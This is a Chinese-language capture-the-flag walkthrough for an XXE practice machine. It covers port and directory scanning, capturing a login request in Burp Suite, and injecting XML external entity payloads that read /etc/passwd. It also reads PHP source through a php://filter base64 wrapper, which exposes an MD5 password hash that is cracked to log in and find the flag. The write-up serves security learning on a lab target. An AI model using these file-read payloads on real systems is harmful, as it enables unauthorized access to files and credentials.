XXE靶机

一.扫描端口 进入xxe靶机

1.1然后进入到kali里 使用namp 扫描一下靶机开放端口等信息

1.2扫描他的目录

二 利用获取的信息

进入到 robots.txt 按他给出的信息

去访问xss 是一个登陆界面 admin.php 也是一个登陆界面

我们访问xss登陆界面 随便输 打开burpsuite抓包 发现数据以post方式提交，并在最下方有xxe代码
发送到repeater提交试试

这里注意 ad 有回显 那么如果将ad 指向其他文件 有可能就有xxe漏洞

三.漏洞利用

我们构造xxe语句 访问 etc/passwd/看看是否有回显

<!DOCTYPE test[
<!ENTITY ad SYSTEM "file:///etc/passwd">
]>

可以看到显示文件 那么继续查看文件 apache首页文件默认路径/var/www/html

发现读取不了

<!DOCTYPE test[
<!ENTITY ad SYSTEM "file:///var/www/html/xxe/index.php">
]>

我们可以用php伪文件协议读取

<!DOCTYPE test[
<!ENTITY ad SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/index.php">
]>

再通过base64 解密 可以看到里面的内容并没有我们想要的 没有可以利用的

但是还有一个文件 /xxe/admin/ 我们没有查看

我们可以用同样的方式查看

<!DOCTYPE test[
<!ENTITY ad SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/admin.php">
]>

base64解密后得到关键信息

可以看到用户名跟md5加密后的密码

md5加密后的密码解密得出用户密码

登入 发现里面没有我们想要的flag

看看是否在xxe文档下

查看页面源代码 得到flag